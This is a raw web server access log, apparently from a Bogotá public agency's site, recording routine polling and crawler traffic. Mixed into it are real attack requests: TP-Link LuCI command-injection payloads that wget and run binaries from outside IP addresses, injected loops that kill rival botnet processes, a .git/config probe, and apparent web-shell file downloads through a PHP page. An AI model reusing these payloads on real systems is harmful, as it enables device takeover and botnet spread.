ige6h6+KTdUKjp5zypZX+K20mzMfeSgk9YFTDkFMcfJy68skcbRKA45pPrfe/tcfu3T/I3LqN3oLhTCU0jTUa0PAnOKf3bZX3zsZ1znbsMU=&u=U2FsdGVkX191jl1jbB7iaS7e4LDzcOlKdoHYymi57EI=&y=U2FsdGVkX1+UhYTmqSYiT++RWD9lS4qosd/Z6OCpqf5rjBQ8B4dFocE15GZRoohc HTTP/1.1" 200 342
186.155.12.71 - - [19/Jun/2024:06:40:13 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+BSGquQOGVf/5RTo2x9k9ngyg/Uy+4EK02hWzxxC0+zc1+7robSl++r/QeEoUzNRk0mDblPTXaDuqAr1WLK58h6TdH1qW5FsiRj3xwzZg45vUx9tAmeHuCiv5NxXpqNq4Q2IqHD4TO4iGGK6fUGoo2HYsJ9XyqDw3fuNqGDvtp6Q70KMfKIHG24od+oXeSMEsWYdmGk+kPyDBsoZcNM6g0XwL+fXgdP4aWytVuw7LR7Kc02v3ARjflJ8xlCBzeykxNf47a9cbkutPMocOqsxY9sBfomTtHYu/sWEOiZro2jVeMWHGu0rNLLsnCMZVNNdzvWtAgZEVdgl80Ebp5gtfhQwov/5QjEopFE2/N8BskDQ0qgUfpdkMMkQ7tqCX719hiXjnL0XHztsRWU8d5fK08MA1ymbbADrD1LZ5ECb+4EifFUXxtGN8bUkIvqEzKoVLAxhgdUTs52HojDl6IIG6fXMXifGi+rY6TNjzE/aAWAJ45hqp+V7GC2mV/dMXiBHEyAsvGx3hfgzuvSu+dFSgWHzBtWDybQDcztWQnPAvdbYDS3kNOBYrtw3oG2HhAMkyynAzas8DNv9x66eqMFI/vrWBAQPxetTd/GDMlfo+RBe0spxMh9n1NzelTb3HHc8svI+1zJWGPS5lK2fKjvDO1dSYWMaxwlodtUborWyXbjdCtPZQJ8FY//UA64imM65OEW1cFBKwRvs5yTAuqWBlSc43Jl4dDjDmt8Tm7YL4Lg8V9y88tzunu&u=U2FsdGVkX191jl1jbB7iaS7e4LDzcOlKdoHYymi57EI=&y=U2FsdGVkX1+UhYTmqSYiT++RWD9lS4qosd/Z6OCpqf5rjBQ8B4dFocE15GZRoohc HTTP/1.1" 200 208
186.155.12.71 - - [19/Jun/2024:06:40:13 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX18ugezWiHAhEU/rMUbnxdumivM5lndBP4sxKnoPvtAgTk21cxJjn+n5 HTTP/1.1" 200 30244
201.245.192.253 - - [19/Jun/2024:06:40:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [19/Jun/2024:06:40:25 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33750
201.245.192.253 - - [19/Jun/2024:06:40:32 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
40.77.188.125 - - [19/Jun/2024:06:41:07 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
66.249.66.19 - - [19/Jun/2024:06:41:24 -0500] "GET /Publicaciones/2024EE116509.pdf HTTP/1.1" 404 228
201.245.192.253 - - [19/Jun/2024:06:41:32 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [19/Jun/2024:06:41:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
84.54.51.37 - - [19/Jun/2024:06:41:55 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F94.156.71.83%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1" 404 1018
201.245.192.253 - - [19/Jun/2024:06:42:11 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [19/Jun/2024:06:42:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [19/Jun/2024:06:42:32 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [19/Jun/2024:06:42:32 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
185.191.127.212 - - [19/Jun/2024:06:42:50 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22dvrLocker%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 1018
45.148.10.174 - - [19/Jun/2024:06:42:53 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 1018
45.148.10.174 - - [19/Jun/2024:06:42:53 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 1018
201.245.192.253 - - [19/Jun/2024:06:43:32 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [19/Jun/2024:06:43:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [19/Jun/2024:06:44:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [19/Jun/2024:06:44:32 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [19/Jun/2024:06:42:58 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.133.77.17 - - [19/Jun/2024:06:45:28 -0500] "GET /images/cr%C3%B3nica-29-nov-1_optimized.jpeg HTTP/1.1" 404 1034
172.22.2.4 - - [19/Jun/2024:06:43:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
201.245.192.253 - - [19/Jun/2024:06:45:32 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [19/Jun/2024:06:45:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
156.59.198.135 - - [19/Jun/2024:06:46:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_sess_obkqgovf8vklgcqc8h5kgpo2t0 HTTP/1.0" 200 1034
201.245.192.253 - - [19/Jun/2024:06:46:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [19/Jun/2024:06:46:32 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.246 - - [19/Jun/2024:06:46:47 -0500] "GET /distrito-lanza-la-patrulla-cazachimeneas-un-vehiculo-que-hara-seguimiento-a-fuentes-moviles-contaminantes.html HTTP/1.1" 200 1010
172.22.2.4 - - [19/Jun/2024:06:46:59 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/ANALISIST-257-96.docx HTTP/1.1" 304 -
201.245.192.253 - - [19/Jun/2024:06:47:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
156.59.198.136 - - [19/Jun/2024:06:47:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_sess_0ucasgu806kkp47r5m7gau93k5 HTTP/1.0" 200 1034
216.245.221.92 - - [19/Jun/2024:06:47:32 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [19/Jun/2024:06:47:32 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [19/Jun/2024:06:47:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [19/Jun/2024:06:48:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [19/Jun/2024:06:48:32 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
40.77.167.24 - - [19/Jun/2024:06:49:23 -0500] "GET /mujeres-que-reverdecen-bogota-intercambian-saberes-y-semillas.html HTTP/1.1" 200 880
201.245.192.253 - - [19/Jun/2024:06:49:32 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [19/Jun/2024:06:49:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [19/Jun/2024:06:50:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [19/Jun/2024:06:48:48 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [19/Jun/2024:06:50:32 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [19/Jun/2024:06:50:51 -0500] "GET /BLA/boletinlegal/.git/config HTTP/1.1" 404 1038
156.59.198.135 - - [19/Jun/2024:06:51:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_sess_gopmgivhij7k67715ehfn3vv23 HTTP/1.0" 200 1034
172.22.2.4 - - [19/Jun/2024:06:49:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
156.59.198.136 - - [19/Jun/2024:06:51:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_sess_4psvcecvncs7ubv14rvsj45vm1 HTTP/1.0" 200 1034
201.245.192.253 - - [19/Jun/2024:06:51:32 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.59.182 - - [19/Jun/2024:06:51:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cxampp%5Cxampp%5Ctmp&f=ib8DB7.tmp&ft=download HTTP/1.1" 200 -
201.245.192.253 - - [19/Jun/2024:06:51:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [19/Jun/2024:06:51:43 -0500] "GET /BLA/boletinlegal/images/arr_l.jpg HTTP/1.1" 304 -
47.128.37.252 - - [19/Jun/2024:06:51:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cmetalmecanica%5Cimages&f=page82.swf&ft=download HTTP/1.1" 200 24165
47.128.20.82 - - [19/Jun/2024:06:51:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Chuelladecarbono%5C&f=._huella_carbono.html&ft=notepad HTTP/1.1" 200 4096
47.128.21.0 - - [19/Jun/2024:06:52:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cmetalmecanica%5Cimages&f=page34.swf&ft=download HTTP/1.1" 200 116248
